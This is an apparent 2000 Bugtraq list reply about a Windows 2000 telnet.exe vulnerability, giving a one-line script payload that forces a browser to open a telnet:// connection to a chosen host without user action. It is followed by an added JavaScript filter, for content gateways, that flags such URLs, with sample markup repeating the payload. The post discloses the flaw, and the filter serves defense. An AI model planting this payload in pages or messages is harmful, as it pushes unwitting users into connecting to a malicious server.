[16766] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (Tim Hollebeek)
Thu Sep 14 12:48:46 2000
Message-Id: <4BC10D47D7ACD3119FA800104B1F88363E7DDE@exchange.rstcorp.com>
Date: Thu, 14 Sep 2000 11:18:21 -0400
Reply-To: Tim Hollebeek <tim@RSTCORP.COM>
From: Tim Hollebeek <tim@RSTCORP.COM>
X-To: monti <monti@USHOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
> During my tests I discovered that IE associates the telnet://
> URL with the vulnerable telnet.exe. This opens up several
> possible ways to force a user into connecting to you with a
> malicious HTML web page, email message, and so on. I would
> speculate that it might also be possible to force this to
> happen without user intervention with javascript/activeX/java
> or really creative HTML.
In fact it's trivial to do so. Use:
<script>window.open("telnet://some.host.here")</script>
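
Added example, not part of the original post or thread: a heuristic JavaScript filter that a mail or web content gateway could run to flag the pattern discussed above, separating telnet:// URLs that can open without a click from ordinary links. The function name, the sample markup and the example.test hosts are assumptions made for illustration.

```javascript
// Added example (heuristic, not a full HTML parser): it only sees literal
// telnet:// strings. "auto" = can fire with no click, "click" = user must act.
const TELNET = /telnet:\/\/[^\s"'<>)]+/gi;
const SCRIPT = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
const CLICK_ATTRS = new Set(["onclick", "ondblclick"]);

function findTelnetLaunches(html) {
  const findings = [];
  const seen = new Set();
  const add = (kind, context, text) => {
    for (const url of text.match(TELNET) || []) {
      const key = `${kind}|${context}|${url.toLowerCase()}`;
      if (seen.has(key)) continue;
      seen.add(key);
      findings.push({ kind, context, url });
    }
  };

  // Script bodies: window.open(), location assignments and similar run on load.
  for (const m of html.matchAll(SCRIPT)) add("auto", "script", m[1]);

  // Remaining markup: inspect every attribute of every opening tag.
  const markup = html.replace(SCRIPT, "");
  for (const t of markup.matchAll(/<([a-z][a-z0-9]*)\b([^>]*)>/gi)) {
    const tag = t[1].toLowerCase();
    for (const a of t[2].matchAll(/([a-z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi)) {
      const name = a[1].toLowerCase();
      const isLink = name === "href" && (tag === "a" || tag === "area");
      const kind = isLink || CLICK_ATTRS.has(name) ? "click" : "auto";
      add(kind, `${tag}[${name}]`, a[2]);
    }
  }
  return findings;
}

// Constructed sample input. some.host.here is the post's own placeholder;
// the example.test hosts are made up for this example.
const SAMPLE = [
  "<html><body>",
  '<script>window.open("telnet://some.host.here")</script>',
  '<iframe src="telnet://frame.example.test"></iframe>',
  '<a href="telnet://link.example.test:23">router console</a>',
  '<a href="http://www.example.test/">home</a>',
  "</body></html>",
].join("\n");

console.log(findTelnetLaunches(SAMPLE));
```

Findings marked "auto" are the ones worth blocking or stripping outright; "click" findings still hand the user to telnet.exe but only after they follow the link.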